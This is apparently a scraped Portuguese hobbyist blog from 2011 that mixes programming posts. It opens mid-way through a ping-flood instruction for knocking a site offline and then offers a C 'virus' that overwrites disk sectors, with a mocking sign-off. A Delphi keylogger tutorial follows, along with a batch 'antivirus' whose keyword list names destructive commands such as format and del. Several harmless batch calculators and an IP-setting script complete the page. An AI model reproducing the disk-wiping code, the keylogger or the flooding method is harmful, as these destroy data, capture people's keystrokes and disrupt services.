vamos entender: ping é usado para checar a conexão com a internet. -l é o tamanho da quantidade do pacote á ser enviado. 65000 é a quantiidade de bytes enviados para o ip ou site, o máximo é 65536. -t significa que é para mandar o valor da quantidade até o usuário cancelar. Ali no site.com você digitava o site que você queria ou o IP. Após você colocar todos os dados era só apertar "enter" . quanto mais pessoas fazendo isso mais rápido iria cair a conexão. Para fazer parar de mandar o ping basta apertar CTRL+C.

Vírus em linguagem C "Bomber"

#include <stdlib.h>
#include <dos.h>
#include <stdio.h>

main () {

    char *vir;
    abswrite (0, 50, 0, vir);
    abswrite (1, 50, 0, vir);
    abswrite (2, 50, 0, vir);
    abswrite (3, 50, 0, vir);
    abswrite (4, 50, 0, vir);
    printf ("FUCK YOU ALL");
    printf ("The Bomber");

}

Depois é só salvar com um nome + o .c no fim e mandar compilar.

Não testei obviamnete MUHUHAHAHA

Obs: código para fins de estudo, não me responsabilizo por danos de terceiros.

17 de out de 2011

Como criar um keylogger em Delphi

function Coloca(txt: String): String;
begin
Form1.Memo1.Text := Form1.Memo1.Text + txt;
end;

E coloque no evento Timer do temporizador:

procedure TForm1.Timer1Timer(Sender: TObject);
var
keyloop, KeyResult : Integer;
begin
keyloop := 0;
repeat
KeyResult := GetAsyncKeyState(keyloop);
if KeyResult = -32767 then
begin
case keyloop of
8: Coloca(' [BACKSPACE] ');
9: Coloca(' [TAB] ');
12: Coloca(' [ALT] ');
13: Coloca(' [ENTER] ');
16: Coloca(' [SHIFT] ');
17: Coloca(' [CONTROL] ');
18: Coloca(' [ALT] ');
20: Coloca(' [CAPS LOCK] ');
21: Coloca(' [PAGE UP] ');
27: Coloca(' [ESC] ');
33: Coloca(' [PAGE UP] ');
34: Coloca(' [PAGE DOWN] ');
35: Coloca(' [END] ');
36: Coloca(' [HOME] ');
37: Coloca(' [SETA ESQUERDA] ');
38: Coloca(' [SETA ACIMA] ');
39: Coloca(' [SETA DIREITA] ');
40: Coloca(' [SETA ABAIXO] ');
45: Coloca(' [INSERT] ');
46: Coloca(' [DEL] ');
91: Coloca(' [WIN ESQUERDA] ');
92: Coloca(' [WIN DIREITA] ');
93: Coloca(' [MENU POP-UP] ');
96: Coloca('0');
97: Coloca('1');
98: Coloca('2');
99: Coloca('3');
100: Coloca('4');
101: Coloca('5');
102: Coloca('6');
103: Coloca('7');
104: Coloca('8');
105: Coloca('9');
106: Coloca(' [NUM *] ');
107: Coloca(' [NUM +] ');
109: Coloca(' [NUM -] ');
110: Coloca(' [NUM SEP. DECIMAL] ');
111: Coloca(' [NUM /] ');
112: Coloca(' [F1] ');
113: Coloca(' [F2] ');
114: Coloca(' [F3] ');
115: Coloca(' [F4] ');
116: Coloca(' [F5] ');
117: Coloca(' [F6] ');
118: Coloca(' [F7] ');
119: Coloca(' [F8] ');
120: Coloca(' [F9] ');
121: Coloca(' [F10] ');
122: Coloca(' [F11] ');
123: Coloca(' [F12] ');
144: Coloca(' [NUM LOCK] ');
186: Coloca('Ç');
187: Coloca('=');
188: Coloca(',');
189: Coloca('-');
190: Coloca('.');
191: Coloca(';');
192: Coloca(' [APÓSTROFO] ');
193: Coloca('/');
194: Coloca(' [NUM PONTO] ');
219: Coloca('´');
220: Coloca(']');
221: Coloca('[');
222: Coloca('~');
226: Coloca('\');
else
if (KeyLoop >= 65) and (keyloop <= 90) then Coloca(Chr(keyloop)); if (keyloop >= 32) and (keyloop <= 63) then Coloca(Chr(keyloop)); //numpad keycodes if (keyloop >= 96) and (keyloop <= 110) then
Coloca(Chr(keyloop));
end;
end; //case;
inc(keyloop);
until keyloop = 255;
end;

coloque o interval do timer para "1" , deixe lá enable:=false se não o timer ficará comfuso, mas vai continuar de boa

Antivírus em Batch com análises de script



@echo off
for /f "tokens=* usebackq" %%w in ("%~0") do (
if "%%w" EQU "::[BOSS]_FIM " GOTO SEGUINTE
)
echo ::[BOSS]_FIM >> "%~0"
copy "%~0" "%windir%\system32\Boss-Av.bat"
:: ADD NO MENU CONTEXTO A OPÇÃO DE ANALIZE
REG delete HKCR\batfile\shell\Analizar... /f >nul
REG delete HKCR\batfile\shell\EDIT_MS-D©S... /f >nul
REG ADD HKCR\batfile\shell /v Analizar... /f >nul
REG ADD HKCR\batfile\shell\Analizar... /v command /f >nul
REG ADD HKCR\batfile\shell\Analizar...\command /ve /d """%0"" """%%1"""" /f
:: PARA EDITAR DIRETAMENTE
REG ADD HKCR\batfile\shell /v EDIT_MS-D©S... /f >nul
REG ADD HKCR\batfile\shell\EDIT_MS-D©S... /v command /f >nul
REG ADD HKCR\batfile\shell\EDIT_MS-D©S...\command /ve /d """"%windir%\system32\edit.com""" """%%1"""" /f >nul
:SEGUINTE
if ["%1"]==[""] (goto:Help)
if ["%1"]==["help"] (goto:Help)
if ["%1"]==["-h"] (goto:Help)
if ["%1"]==["-help"] (goto:Help)
if ["%1"]==["/?"] (goto:Help)
if not exist %~1 (
echo Av Batch Vr 1.6
echo O arquivo nÆo foi encontrado ou foi digitado o nome errado.
echo.
goto:eof
)
set nome=%~n1
set /a contador=0
Echo @Echo off > Av-Boss-Log-%~n1.bat
Echo mode 80,100 >> Av-Boss-Log-%~n1.bat
Echo color 0e >> Av-Boss-Log-%~n1.bat
echo echo %date% Av Batch Vr 1.6 >> Av-Boss-Log-%~n1.bat
call :faixa
type %1 | find /i "tsshutdn" > nul && (
set /a contador=%contador%+1
Echo Echo Comandos perigosos detectados em %1 : TSSHUTDN
Echo Echo Comando TSSHUTDN : Desligamento do servidor.
Echo Echo N¡vel de perigo : M‚dio.
echo.
) >> Av-Boss-Log-%~n1.bat & call :faixa
type %1 | find /i "copy" > nul && (
set /a contador=%contador%+1
Echo Echo Comandos perigosos detectados em %1 : COPY
Echo Echo Comando COPY : Copia de arquivos.
Echo Echo N¡vel de perigo : Baixo.
echo.
) >> Av-Boss-Log-%~n1.bat & call :faixa
type %1 | find /i "attrib" > nul && (
set /a contador=contador+1
Echo Echo Comandos perigosos detectados em %1 : ATTRIB
Echo Echo Comando ATTRIB : Mudan‡a de atributos de arquivos.
Echo Echo N¡vel de perigo : M‚dio.
echo.
) >> Av-Boss-Log-%~n1.bat & call :faixa
type %1 | find /i "shutdown" > nul && (
set /a contador=contador+1
Echo Echo Comandos perigosos detectados em %1 : SHUTDOWN
Echo Echo Comando SHUTDOWN : Desligamento do sistema.
Echo Echo N¡vel de perigo : M‚dio.
echo.
) >> Av-Boss-Log-%~n1.bat & call :faixa
type %1 | find /i "assoc" > nul && (
set /a contador=contador+1
Echo Echo Comandos perigosos detectados em %1 : ASSOC
Echo Echo Comando ASSOC : Associa‡Æo de tipo de arquivos.
Echo Echo N¡vel de perigo : M‚dio.
echo.
) >> Av-Boss-Log-%~n1.bat & call :faixa
type %1 | find /i "taskkill" > nul && (
set /a contador=%contador%+1
Echo Echo Comandos perigosos detectados em %1 : TASKKILL
Echo Echo Comando TASKKILL : Termina processos.
Echo Echo N¡vel de perigo : M‚dio.
echo.
) >> Av-Boss-Log-%~n1.bat & call :faixa
type %1 | find /i "tskill" > nul && (
set /a contador=%contador%+1
Echo Echo Comandos perigosos detectados em %1 : TSKILL
Echo Echo Comando TSKILL : Termina processos.
Echo Echo N¡vel de perigo : M‚dio.
echo.
) >> Av-Boss-Log-%~n1.bat & call :faixa
type %1 | find /i "rd" > nul && (
set /a contador=%contador%+1
Echo Echo Comandos perigosos detectados em %1 : RD
Echo Echo Comando RD : Deleta pastas.
Echo Echo N¡vel de perigo : Alto
echo.
) >> Av-Boss-Log-%~n1.bat & call :faixa
type %1 | find /i "rmdir" > nul && (
set /a contador=%contador%+1
Echo Echo Comandos perigosos detectado em %1 : RMDIR
Echo Echo Comando RMDIR : Deleta pastas.
Echo Echo N¡vel de perigo : Alto.
echo.
) >> Av-Boss-Log-%~n1.bat & call :faixa
type %1 | find /i "erase" > nul && (
set /a contador=%contador%+1
Echo Echo Comandos perigosos detectados em %1 : ERASE
Echo Echo Comando ERASE : Deleta arquivos.
Echo Echo N¡vel de perigo : Alto.
echo.
) >> Av-Boss-Log-%~n1.bat & call :faixa
type %1 | find /i "del" > nul && (
set /a contador=%contador%+1
Echo Echo Comandos perigosos detectados em %1 : DEL
Echo Echo Comando DEL : Deleta arquivos.
Echo Echo N¡vel de perigo : Alto
echo.
) >> Av-Boss-Log-%~n1.bat & call :faixa
type %1 | find /i "net user" > nul && (
set /a contador=%contador%+1
Echo Echo Comandos perigosos detectados em %1 : NET USER
Echo Echo Comando NET USER : Administra‡Æo de usu rios.
Echo Echo N¡vel de perigo : Baixo.
echo.
) >> Av-Boss-Log-%~n1.bat & call :faixa
type %1 | find /i "format" > nul && (
set /a contador=%contador%+1
Echo Echo Comandos perigosos detectados em %1 : format
Echo Echo Comando FORMAT : formata‡Æo de discos.
Echo Echo N¡vel de perigo : Alto.
echo.
) >> Av-Boss-Log-%~n1.bat & call :faixa
type %1 | find /i "autorun.inf" > nul && (
set /a contador=%contador%+1
Echo Echo Comandos perigosos detectados em %1 : Autorun.inf
Echo Echo Comando Autorun.inf : Manipula‡Æo de arquivos
Echo Echo N¡vel de perigo : M‚dio-Baixo.
echo.
) >> Av-Boss-Log-%~n1.bat & call :faixa
type %1 | find /i "boot.ini" > nul && (
set /a contador=contador+1
Echo Echo Comandos perigosos detectados em %1 : Boot.ini
Echo Echo Comando Boot.ini : Manipula‡Æo de arquivos
Echo Echo N¡vel de perigo : M‚dio.
echo.
) >> Av-Boss-Log-%~n1.bat & call :faixa
type %1 | find /i "\drivers\etc\hosts" > nul && (
set /a contador=%contador%+1
Echo Echo Comandos perigosos detectados em %1 : HOSTS
Echo Echo Comando HOSTS : Manipula‡Æo de arquivos
Echo Echo N¡vel de perigo : Baixo.
echo.
) >> Av-Boss-Log-%~n1.bat & call :faixa
type %1 | find /i "cacls" > nul && (
set /a contador=%contador%+1
Echo Echo Comandos perigosos detectados em %1 : CACLS
Echo Echo Comando CACLS : Manipula‡Æo de Permissäes, para arquivos ou pastas.
Echo Echo N¡vel de perigo : Alto.
echo.
) >> Av-Boss-Log-%~n1.bat & call :faixa
type %1 | find /i "reg add" > nul && (
set /a contador=%contador%+1
Echo Echo Comandos perigosos detectados em %1 : REG ADD
Echo Echo Comando REG ADD : Altera‡Æo de registro de Windows.
Echo Echo N¡vel de perigo : M‚dio.
echo.
) >> Av-Boss-Log-%~n1.bat & call :faixa
type %1 | find /i "reg delete" > nul && (
set /a contador=%contador%+1
Echo Echo Comandos perigosos detectados em %1 : REG DELETE
Echo Echo Comando REG DELETE : Elimina‡Æo de chaves/Valores no registro do Windows
Echo Echo N¡vel de perigo : M‚dio.
echo.
) >> Av-Boss-Log-%~n1.bat & call :faixa
type %1 | find /i "regsvr23" > nul && (
set /a contador=%contador%+1
Echo Echo Comandos perigosos detectados em %1 : REGSVR32
Echo Echo Comando REGSVR32 : Administra‡Æo de arquivos.
Echo Echo N¡vel de perigo : M‚dio.
echo.
) >> Av-Boss-Log-%~n1.bat & call :faixa
type %1 | find /i "net stop" > nul && (
set /a contador=%contador%+1
Echo Echo Comandos perigosos detectados em %1 : Net Stop
Echo Echo Comando Net Stop : Detem servi‡os.
Echo Echo N¡vel de perigo : M‚dio.
echo.
) >> Av-Boss-Log-%~n1.bat & call :faixa
type %1 | find /i "reg.exe Add" > nul && (
Echo Echo Comandos perigosos detectados em %1 : REG ADD
Echo Echo Comando REG ADD : Altera‡Æo do registro do Windows.
Echo Echo N¡vel de perigo : M‚dio.
echo.
) >> Av-Boss-Log-%~n1.bat & call :faixa
type %1 | find /i "CMDOW" > nul && (
set /a contador=%contador%+1
Echo Echo Comandos perigosos detectados em %1 : CMDOW
Echo Echo Comando CMDOW : Oculta‡Æo de telas.
Echo Echo N¡vel de perigo : M‚dio.
echo.
) >> Av-Boss-Log-%~n1.bat & call :faixa
if %contador%==0 (
echo arquivo : %1 livre de comandos perigosos.
echo.
) >> Av-Boss-Log-%~n1.bat & call :faixa
::echo %contador%
if %contador% GTR 0 (
Echo Echo Quantidade de comandos perigosos detectados : %contador% >> Av-Boss-Log-%~n1.bat
Echo Pause ^>nul >> Av-Boss-Log-%~n1.bat
goto:DelChoice
) else (
start "" Av-Boss-Log-%~n1.bat
goto:eof
)
:DelChoice
echo O arquivo contem mais de um comando perigoso.
echo Deseja elimina lo?
echo.
echo 1.-Sim
echo 2.-NÆo
echo.
set /p opção=Digite o numero da op‡Æo desejada:
if not defined opção (goto:DelChoice)
if %opção%==1 (
del /f /q "%1" && Echo arquivo eliminado.
start "" Av-Boss-Log-%~n1.bat
)
if %opção%==2 (start Av-Boss-Log-%~n1.bat & goto:eof)
if %opção% GTR 2 (goto:DelChoice)
if %opção% LSS 1 (goto:DelChoice)
exit /b
:Help
echo Av Batch Vr 1.6
echo Checa se os arquivos Batch contem comandos perigosos.
echo.
echo Modo de uso :
echo Clique com o lado direito do mouse sobre o arquivo
echo.
echo E clique em Analizar
echo.
Echo OBS. A op‡Æo "Deseja elimina lo?" exclui permanentemente
echo O arquivo portanto tome cuidado !
pause >nul
goto:eof
:faixa
echo echo. >> Av-Boss-Log-%nome%.bat
echo echo ******************************************************************************** >> Av-Boss-Log-%nome%.bat
goto:eof

Conversor de .EXE para .BAT

@echo off
set cd2=%cd%
title Exe_To_Bat_Converter
setlocal enabledelayedexpansion
:init
set n=0
echo Arraste o .exe para este local e pressione enter!
set /p arquivo=
set arquivo=%arquivo:"=%
if exist "%arquivo%" goto main
msg * Arquivo não encontrado!
goto init
:main
call :name %arquivo%
cd %temp%
echo Aguarde...
tasklist|find "cmd">list
for /f "tokens=2" %%a in (list) do (
set /a n=!n!+1
)
dir /b /A:D *.tmp>pasta
cd %cd2%
start /min "" "%arquivo%"
taskkill -f -im "%result%"|find "ERRO"
if %errorlevel%==0 ( msg * Batch muito pequeno!&exit)
tasklist|find "cmd">list
for /f "tokens=2 skip=%n% " %%a in (list) do (
taskkill /pid %%a -f >nul
)
cd %temp%
:verificar
for /f "tokens=* " %%a in ('dir /b /A:D *.tmp') do (
call :ver %%a
)
msg.exe * Ocorreu um erro. Aguarde...
goto verificar
:sair
msg.exe * Processo concluido.
cd %cd2%
del list
exit
:name
set nome=%*
set result=%nome:~-1%%result%
set nome=%nome:~,-1%
if not "%nome:~-1%"=="\" call :name %nome%
goto fim
:ver
set a=%*
find "%a%" pasta>nul
if %errorlevel%==1 (cd %a%&copy /-y * "%cd2%"&goto sair)
:fim

Calculadora de equações simples

colocar no bloco de notas este codigo e salvar com o nome que voce quiser e no final colocar .bat depois é só executar


@echo off
:1
cls
echo Digite a equação Ex: (12-6)*2/10+4/7-13
set /p valor= :
call :calc "%valor%"
pause >nul
goto 1
:calc
setlocal
set "vbs=%temp%\tmp.vbs"
>"%vbs%" echo On Error Resume Next : WScript.Echo Eval(WScript.Arguments(0))
cscript //nologo "%vbs%" "%~1"
del "%vbs%"
exit /b
.

Script para alteracao de ip,netmask,gateway e dns

@ECHO OFF

REM Script para alteracao de ip,netmask,gateway e dns

:inicio

cls

echo SCRIPT PARA ALTERACAO DE IP

echo Que tipo de configuracao de IP deseja fazer:

echo 1- Manual
echo 2- Automatica
echo 3- Sair

set/p opcao=

cls

if "%opcao%" EQU "1" (goto manual)
if "%opcao%" EQU "2" (goto automatico)
if "%opcao%" EQU "3" (goto sair)

:manual

echo Qual numero de ip que deseja colocar?

set/p numeroip=

cls

echo Qual a netmask?

set/p mascara=

cls

echo Qual o Gateway?

set/p gateway=

cls

echo Qual DNS?

set/p dns=

cls

netsh interface ip set address name="Local Area Connection" static %numeroip% %mascara% %gateway% 0
cls
netsh interface ip set dns name="Local Area Connection" static %dns%
cls

:automatico

netsh interface ip set address name="Local Area Connection" dhcp
cls

goto inicio

:sair
exit.

16 de out de 2011

Calculadora 4.0 em Batch (.bat)

Coloque no bloco de notas e salve como: calculadora4.bat


@echo off
echo Somar
echo.
set /p numero1= Informe um numero:
echo %numero1%
set /p numero2= Informe o 2 numero:
echo %numero2%
set /a valor=numero1+numero2
echo.
echo O resultado da soma e %valor%
echo.
echo Subtrair
echo.
set /p numero1= Informe um numero:
echo %numero1%
set /p numero2= Informe o 2 numero:
echo %numero2%
set /a valor=numero1-numero2
echo.
echo O resultado da subtracao e %valor%
echo.
echo Multiplicar
echo.
set /p numero1= Informe um numero:
echo %numero1%
set /p numero2= Informe o 2 numero:
echo %numero2%
set /a valor=numero1*numero2
echo.
echo O resultado da multiplicacao e %valor%
echo.
echo Dividir
echo.
set /p numero1= Informe um numero:
echo %numero1%
set /p numero2= Informe o 2 numero:
echo %numero2%
set /a valor=numero1/numero2
echo.
echo O resultado da divisao e %valor%
echo.
pause

Calculadora 3.0 em Batch (.bat)

Copiar no bloco de notas e salvar como calculadora3.bat


@echo off
:A
title Calculadora
cls
Color 0A
echo Digite 1 Para Adicao, 2 Para Subtracao, 3 Para Multiplicacao, 4 Para Divisao.
set /p cm=
if %cm%==1 goto adi
if %cm%==2 goto sub
if %cm%==3 goto mul
if %cm%==4 goto div
cls
goto A
cls
:adi
cls
title Adicao
echo Coloque a 1 Parcela:
set/p par1=
cls
echo Coloque a 2 Parcela:
set /p par2=
cls
set /a par3=%par1%+%par2%
echo Resultado: %par3%
echo.
echo Pressione Qualquer Tecla para Fazer outra conta. . .
pause >nul
goto A
exit
:sub
cls
title Subtracao
echo Coloque o Diminuendo:
set/p par1=
cls
echo Coloque o Subtraendo:
set /p par2=
cls
set /a par3=%par1%-%par2%
echo Resultado: %par3%
echo.
echo Pressione Qualquer Tecla para Fazer outra conta. . .
pause >nul
goto A
exit
:mul
cls
title Multiplicacao
echo Coloque o Multiplicando:
set/p par1=
cls
echo Coloque o Multiplicador:
set /p par2=
cls
set /a par3=%par1%*%par2%
echo Resultado: %par3%
echo.
echo Pressione Qualquer Tecla para Fazer outra conta. . .
pause >nul
goto A
exit
cls
:div
cls
title Divisao
echo Coloque o Dividendo:
set/p par1=
cls
echo Coloque o Divisor:
set /p par2=
cls
set /a par3=%par1%/%par2%
echo Resultado: %par3%
echo.
echo Pressione Qualquer Tecla para Fazer outra conta. . .
pause >nul
goto A
exit

Calculadora 2.0 em Batch (.bat)

Você deve copiar este código no bloco de notas e depois salvar como calculadora.bat

@echo off
setlocal enabledelayedexpansion
:inic
cls
echo Calculadora.BAT
echo ----------------------------------------------------------
echo * Expressao aritmetica nao deve conter espaco em branco.
echo * Use ponto para separar inteiro/decimal (virgula nao).
echo * Operadores aritms: +-*/ Exemplo: 123.55*868.33
echo ----------------------------------------------------------
echo.
echo Terminar: X + ENTER
set /p "expr=Digite expressao: "
set r1=!expr:~0,1!
if %r1%==x goto fim
if %r1%==X goto fim

:Tamanho da expressao
set exprX=%expr%x
::acima adicionei 1 digito, depois desconto. Se expr="" bat entra em loop.

:TamanhoLoop
if not "!exprX:~%TamanhoExpr%,1!"=="" (
set /a TamanhoExpr += 1
goto TamanhoLoop
)

set /a TamanhoExpr=%TamanhoExpr%-1
set /a cont=-1
set sinal=indef
set def=nao
set op1=xxx
set PosicaoSinal=0

:calc
::achando posicao do sinal aritm(+-*/)
set /a cont=%cont%+1
if %cont% == %tam% goto prox
set dig=!expr:~%cont%,1!

if %dig%==+ if %sinal%==indef (
set sinal=adic
goto prox
)
if %dig%==- if %sinal%==indef (
set sinal=subtr
set def=sim
)
if %dig%==* if %sinal%==indef (
set sinal=mult
set def=sim
)
if %dig%==/ if %sinal%==indef (
set sinal=div
set def=sim
)
if %def%==sim goto prox
goto calc
goto prox

:prox
::op1 1a. parte da expressao, op2 2a. parte
::ps posicao do sinal, p2p posicao inicio 2a parte da expressao,

set /a ps=%cont%+1
set /a pss=%ps%-1
set /a tam1=%cont%
set /a tam2=%TamanhoExpr%-%tam1%-1
set op1=!expr:~0,%cont%!
set op2=!expr:~%ps%,%tam2%!
set opx=!expr:~%pss%,1!
set /a p1=0
set /a cpt=0

:remov1
::removendo ponto decimal
set /a cpt=%cpt%+1
if %cpt%==%tam1% goto prox2
set sub1=!op1:~%cpt%,1!
if %sub1%==. goto prox2
goto remov1

:prox2
set /a p1=%cpt%+1
set /a p2=0
set /a cpt=0

:remov2
set /a cpt=%cpt%+1
if %cpt%==%tam2% goto prox3
set sub2=!op2:~%cpt%,1!
if %sub2%==. goto prox3
goto remov2

:prox3
set /a p2=%cpt%+1
set string1=%op1000
set string2=%op2000
set /a casas1=2
set /a casas2=2
if %sinal%==mult (
set /a casas1=1
set /a casas2=1
)

if %sinal%==div (
set /a casas1=1
set /a casas2=1
)

if p1==%tam1% goto prox4
set string1=!string1:.=!

:prox4
if p2==%tam2% goto x1000
set string2=!string2:.=!

:x1000
set /a str1=%p1%+%casas1%
set string1=!string1:~0,%str1%!
set /a str2=%p2%+%casas2%
set string2=!string2:~0,%str2%!
set /a virg1=1
set /a virg2=1
::prevenindo No.Octal (0500 p.ex)
:octal1
set oc=!string1:~0,1!
if %oc%==0 (
set string1=!string1:~1,15!
set /a virg1=%virg1%+1
goto octal1
) else goto octal2

:octal2
set oc=!string2:~0,1!
if %oc%==0 (
set string2=!string2:~1,15!
set /a virg2=%virg2%+1
goto octal2
) else goto prox5

:prox5
set /a val1=%string1%
set /a val2=%string2%
if %sinal%==adic goto adic
if %sinal%==subtr goto subtr
if %sinal%==mult goto mult
if %sinal%==div goto div

:adic
set /a result=%val1%+%val2%
goto ponto

:subtr
set /a result=%val1%-%val2%
goto ponto

:mult
set /a y1=%val1%/100
set /a y2=%val2%/100
set /a prov1=%y1%*%y2%
set /a w1=%y1%*100
set /a w2=%y2%*100
set /a z1=%val1%-%w1%
set /a z2=%val2%-%w2%
set /a r1=%z1%*%w2%
set /a r2=%z2%*%w1%
set /a prov2=%r1%+%r2%
set /a rest=0
if not %prov2%==0 set rest=!prov2:~1,3!
if not %prov2%==0 set /a rest=%rest%*10
)
set /a prov2=%prov2%/10000
set /a prov3=%z1%*%z2%
set /a prov3=%prov3%+%rest%
set /a resultado=%prov1%+%prov2%
set prov3=!prov3:~0,3!
set resultado=%resultado%.%prov3%
goto resul

:div
set oc=%val1
set /a val1=%oc%
set /a result=%val1%/%val2%
if %result% gtr 9 goto ponto
set fu=0.0
if %result%==0 set fu=0.00
set /a val1=%val1%*100
set /a result=%val1%/%val2%
set resultado=%fu%%result%
goto resul

:ponto
set result=%result%

:virgLoop
if not "!result:~%TamanhoRes%,1!"=="" (
set /a TamanhoRes += 1
goto virgLoop
)

set /a cpt=%TamanhoRes%-3
if %sinal%==div set /a cpt=%cpt%+1
set /a oc=%cpt%
set resultado=!result:~0,%cpt%!.!result:~%oc%,3!

:resul
set fu=!resultado:~0,1!
if %fu%==. set resultado=0%resultado%
set /a result=resultado
if %result% gtr 2146999999 set resultado=%resultado%... ERRO: numero muito grande...
echo.
echo Resultado: %resultado%
echo.
echo.
set /p "oc= Pressione qualquer tecla..."
:rele
set expr=
set TamanhoExpr=
set cont=
set sinal=
set def=
set op1=
set op2=
set opx=
set PosicaoSinal=
set dig=
set ps=
set pss=
set tam1=
set tam2=
set p1=
set p2=
set cpt=
set sub1=
set sub2=
set string1=
set string2=
set casas1=
set casas2=
set str1=
set str2=
set virg1=
set virg2=
set oc=
set result=
set resultado=
set y1=
set y2=
set prov1=
set prov2=
set prov3=
set w1=
set w2=
set z1=
set z2=
set r1=
set r2=
set rest=
set val1=
set val2=
goto inic
:fim
::--------------------------------